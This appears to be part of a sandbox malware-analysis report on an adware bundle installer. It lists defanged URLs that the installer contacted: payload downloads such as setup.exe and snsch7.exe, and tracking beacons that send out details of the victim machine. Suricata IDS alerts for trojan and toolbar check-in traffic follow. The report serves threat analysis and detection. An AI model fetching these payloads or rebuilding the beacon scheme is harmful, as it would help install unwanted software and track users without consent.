| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673 | |
| hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 | |
| hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 | |
| hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 | |
| hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 | |
| hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=803&action=na&ms_vr=3&clock=22531&rnd=18667 | |
| hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1729&action=na&ms_vr=3&clock=22610&rnd=18667 | |
| hxxp://rep.shopper-pro.com/app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser= | |
| hxxp://rep.shopper-pro.com/app/ping.ashx?action=start&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=TWljcm9zb2Z0IFdpbmRvd3MgWFAgUHJvZmVzc2lvbmFsIFNlcnZpY2UgUGFjayAzIChidWlsZCAyNjAwKQA=&protocol=&size=0&ref=&browser= | |
| hxxp://zh9k747-1ghhyl1c.netdna-ssl.com/YTDownloaderFull.exe | |
| hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_c | |
| hxxp://stats.globalnodemax.com/installer.gif?action=finished&LFMR=NA&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 | |
| hxxp://rep.ytdownloader.com/app/ping.ashx?action=uidCreated&userid={A12A645F-7F13-46EC-98C0-57B180FEB515}&usid=1844237615-1960408961-1801674531&aff=obrdc1_0_0_0_0,99999999-9999-4a59-bea0-eea83fb95fc9,&v=1.0.8654.1177&url=&title=&pingtext=&protocol=&size=0&ref=&browser= | |
| hxxp://dl.ourinputinfonet.com/web/gf/all/setup.exe | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_a | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1438402674 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 | |
| hxxp://stats.globalnodemax.com/installer.gif?action=started&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402673&procruntime=7&rnd=1438402680 | |
| hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_c | |
| hxxp://logs.globalnodemax.com/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=001729&country=ua&app=70881&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402674&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402674 | |
| hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_b | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_d | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673 | |
| hxxp://dl.ourinputinfonet.com/spdbt/shoppy/snsch7.exe | |
| hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_d | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 | |
| hxxp://dnnw5pp7-zxis6jz8.netdna-ssl.com/t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 | |
| hxxp://logs.globalnodemax.com/monetization.gif?event=3&ibic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&campaign=000803&country=ua&app=70299&os=XP32&defbro=ie&chver=na&ffver=na&iever=&starttime=1438402673&asw=0_1073750528_-2147483648_2048&browser=&rnd=1438402673 | |
| hxxp://errors.globalnodemax.com/installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681 | |
| hxxp://stats.globalnodemax.com/installer.gif?action=finished&LFMR=NA&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_90&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 | |
| hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_b | |
| hxxp://stats.globalnodemax.com/installer.gif?action=started&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_77&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgJKRTYLK2GHYcH1gNxWn EAECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1438402674&procruntime=6&rnd=1438402680 | |
| hxxp://stats.globalnodemax.com/apps.gif?action=install&app=70881&appver=&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402674&lifetime=0&silent=1&crtnm=na&procstarttime=1438402674&procruntime=13&rnd=1438402687 | |
| hxxp://stats.globalnodemax.com/apps.gif?action=install&app=70299&appver=&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&installtime=1438402673&lifetime=0&silent=1&crtnm=na&procstarttime=1438402673&procruntime=14&rnd=1438402687 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 | |
| hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_e | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1438402685 | |
| hxxp://dl.globalnodemax.com/spdbt/shoppy/snsch7.exe_a | |
| hxxp://dl.globalnodemax.com/web/gf/all/setup.exe_e | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=200&n=init_end_funnel_step_name&rnd=1438402681 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=10000&n=deploy_end_funnel_step_name&rnd=1438402686 | |
| hxxp://errors.globalnodemax.com/installer-error.gif?action=sesamy&app=70881&appver=0&ver=1_36_01_22&version_date=15-07-31&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=96A280AD666E4AB5A58FCCD38A65BDFCPI&srcid=001729&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873289&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402674&procruntime=7&rnd=1438402681 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1438402686 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=001729&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 | |
| hxxp://errors.globalnodemax.com/utility.gif?report=fdata&f=1&c=000803&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1438402685 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY Executable served from Amazon S3
ET TROJAN Possible Win32/Gapz MSIE 9 on Windows NT 5
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET MALWARE Win32/Toolbar.CrossRider.A Checkin
SURICATA STREAM FIN out of window
SURICATA STREAM SHUTDOWN RST invalid ack
Traffic
